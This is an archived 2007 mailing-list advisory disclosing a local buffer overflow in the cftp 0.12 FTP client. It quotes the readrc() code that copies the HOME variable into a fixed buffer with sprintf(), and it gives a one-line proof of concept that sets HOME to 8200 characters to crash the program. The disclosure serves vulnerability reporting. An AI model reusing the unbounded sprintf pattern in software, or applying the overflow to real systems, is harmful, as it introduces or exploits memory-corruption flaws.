Vulnwatch mailing list archives
cftp 0.12 (readrc) Local buffer overflow vulnerability
From: starcadi <starcadi () gmail com>
Date: Mon, 19 Mar 2007 22:53:01 +0100
Description: CFTP is Comfortable FTP, a full screen ftp client. Supported are FTP both with active and passive data connections, IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for authorization and connection encryption). Found local buffer overflow in readrc() with sprintf() with no sizelen control. source: http://ftp.giga.or.at/pub/nih/cftp/ Source error: int readrc(char **userp, char **passp, char **hostp, char **portp, char **wdirp, int check_alias) { FILE *f; char b[8192], *p, *tok, *q, *home; char *user, *pass, *host, *port, *wdir; if ((home=getenv("HOME")) == NULL) home = ""; sprintf(b, "%s/.cftprc", home); if ((f=fopen(b, "r")) == NULL) { if (errno == ENOENT) return 0; return -1; } [..] } error in sprintf(), no sizelen control in getenv(). Proof of concept: $ export HOME=`perl -e "print 'A'x8200"` $ cftp Segmentation fault $ -- .original http://intel.shacknet.nu/ ~ starcadi
Current thread:
- cftp 0.12 (readrc) Local buffer overflow vulnerability starcadi (Mar 20)